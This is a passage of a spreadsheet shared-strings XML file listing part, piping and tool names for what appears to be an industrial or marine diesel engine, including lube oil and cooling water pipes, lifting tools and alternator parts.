    <t>Servo oil HP Pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Servo oil HP fitting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE, CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES-MAN.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL.PIPE.OUT. SHIELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVERSPEED STOP PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-CYL.LUB.OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE CONNECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADAPTOR F. SAE FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTOR BLOCK, STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONECTOR BLOCK, 90 DEGR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HIGH PRESSURE PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE HEAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL INLET PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH P.SEAL.OIL INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH P.SEAL.OIL OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONN.BLOCK, 90 DEG.BORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT SEAL, ROTARY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil Centrifuge</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Waste oil tray</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub oil pipes, axial bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Valve seat, lub oil</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBE OIL PIPE ON AFT. END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL INLET PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub. oil piping, fuel inj. pump</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.PIPE F.ROLLERG&amp;ROCKAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. O. OUTL. SUCT. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTL. PUMP INL. THERM. V.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTL. THERM. V. INL. COOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTL. THERM. VALVE/COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBE O. DISTRIBUTION PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF LUBE O. PIPE T.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE FROM T.C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RESTRICTION 1/5</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEVEL SWITCH ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL INLET COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLET SEALING OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING KIT, PRELUB.PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH FOR DISTRI. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAGNETIC FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL SYSTEM II</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF FORCED LUBE OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLET THERMOSTATIC VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL INLET ON FREE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INLET LUB. OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBE OIL DISTRIBUTOR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH FOR FLOW SWITCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELD FOR PLATE COOLERS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OF GEAR WHEEL DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REMACHINING OF HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RESTRICTION F.LUB.O. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BURSTING CAP PROTECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PERFORATED CYLINDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BURSTING CAP COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Diaphragm, Starting air</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT,SEALING AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SAELING AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTR.AIR PIPE-ST.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-CLEANING TURBO.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-CLEANING TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BURSTING PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR ADJUSMENT SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RESTRICTION FOR AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGRAM OF REMOTE CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Gland Flange</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE PROFIL.F.PIPE CLAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET F. SOLENOID VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. F. CONTROL AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Control air for preheating valve</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELD.COUPL. WITHOUT UNION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Distribution block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRESHWATER INLET-OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-FRESHWATER INL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLOCK F.FRESHWATER OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-DRAIN FRESHWATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-FRESHWATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-FRESHWATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THERMOMETER PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-DRAIN FRESH WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRANCH PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE,CLEANING TC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEANING PIPE-AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-CLEANING AC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-DRAIN FUNNEL AC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lamella - Support</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-AUX.BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-COOLING WATER AC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOL. W. PIPE, AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-BENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING WATER OUTLET PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Non-return flap</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NOZZLE COOLING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. INLET TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Preheater unit, arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Throttle insert, mounting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. DISTRIBUTION PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR PT01</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR PI01</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLET LUB. OIL COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIXING PLATE FOR CLAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOTTOMPLATE FOR CLAMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. Piping</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>H.T. OUTLET THERM. VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKCASE VENTILATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE-COUPLING H.P.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEE-COUPLING L.P.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BEND HIGH PRESSURE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLEXIBLE STEEL TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RETAINING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPRING HOLDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTRIBUTION PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDING ANGLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS TRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ATT. IMPULSE TRANSMITTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MIXING UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINKAGE F.THROTTLE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS DETECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS DETECTION MONITOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF SUPPORT BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HHI alternator - 3M-011003-1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HHI alternator - 3M-009512-1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEC. F. ALTERNATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PARTS FOR ALTERNATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Basler DECS 100 regulator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Terminal box extension</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PULLING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL-TOP SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL-BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL-CRANKSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting cyl. for control piston</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tightening device, nozzle nut</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for cylinder crankcase</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Spare parts for test</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>THRUST PIECE,CONTR.FEED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE,CONTR/SEAL OIL DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Removing device for flame ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools set</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Disassembly tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pressure part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pneumatic inpact spanner</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Bush for inserting</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Assembly instruction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ass. measuring device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rotating angle coupling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Ass. lifting handle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting handle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Honing stone</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Open circuit monitoring device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fittning and removing device</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Loading rack</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOMMENDED WEARING PARTS 4000 H</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOMMENDED WEARING PARTS 8000 H</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOMMENDED WEARING PARTS 12000</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOMMENDED WEARING PARTS 16000</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOMMENDED WEARING PARTS 20000</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOMMENDED WEARING PARTS 24000</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOMMENDED WEARING PARTS 28000</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECOMMENDED WEARING PARTS 32000</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING MACHINE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL F. FLOW CHECK VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAX. PRESSURE INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPL. DRW. FOR INDICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PARTS &amp; TOOL BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LASHING FITTINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST TOOL FOR FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONNECTOR F. NITROGEN GAS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAGNIFIER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BALANCER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL F. GRINDING OF VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RATCHET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCKING PLUG</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PICTURE OF TOOL KIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RINGHOLDER-SLOPING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ST.TOOL F.NORM. MAINTENAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TWIST DRILL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HAND CHAIN HOIST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING BEAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL F.UPPER MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL LOCKER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING JACK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESS. TEST TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAGNET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REPAIR/SERVICE VEHICLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRA TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL VEHICLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLIDING PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BORING CUTTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INJECTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPL.DRAW. F. CE-MARKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shackle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SETTING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STOP PIECE, MOUNT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LOCATING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRISME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SP.PART KIT F. CYL. UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.TOOLS COMPL. CE-MARK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pilot spindle</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fitting dev. inject.pump spring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Fitting device valve seat rings</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC HAND PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DEVICE F. CYL. HEAD/LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DEVICE F. NOZZLE TEST</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSS MEMBER FOR SLINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Screwdriver</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Welded piece</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOTTOM FOR WOODEN BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LID FOR WOODEN BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSBAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EYE SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISTRIBUTING PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPANNER FOR COUPLING NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WRENCH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING STRAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL CONTAINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ACRYL PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOL PANEL COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR FOR FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERNAL LIMIT GAUGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENTING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTRACTOR VALVE SEAT RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRINDING TABLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GRIND.TOOL F.SEAT F.F.VAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tools for panel MS909</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Selection in MS.909</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,UPPER, LUB.O.OUTL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE,LOWER, LUB.O.OUTL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RUBBER PLATE, LUB.O.OUTL.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPEC. LUB. OIL BOTT. TANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRENGTHENING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emulsifier Unit - Sys. specific.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Emulsifier Unit - WIF</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE WITH THREAD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE, SHAPED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT, BOOSTER UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEATING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Diesel Switch</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOOSTER PUMP UNIT, HPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORK PLATE AT TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FORK PLATE AT NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT FOR HYDR,TENSIONING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EQUIPMENT F.HYDR.BRACING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF VIBRATION COMPENSATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Distance rod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Nut for hydr. topbracing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lifting attachments</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pushing tool</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT,ROUND,TOMMY BAR HOLES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLUG F.ALIGNM.SCREW HOLE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD FOR END CHOCK BOLT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LINER FOR END CHOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Quality Specification, 4-Stroke</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPL. DRAWING COOLER BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIFFUSOR RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLADE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPRESSOR INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPRESSOR HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
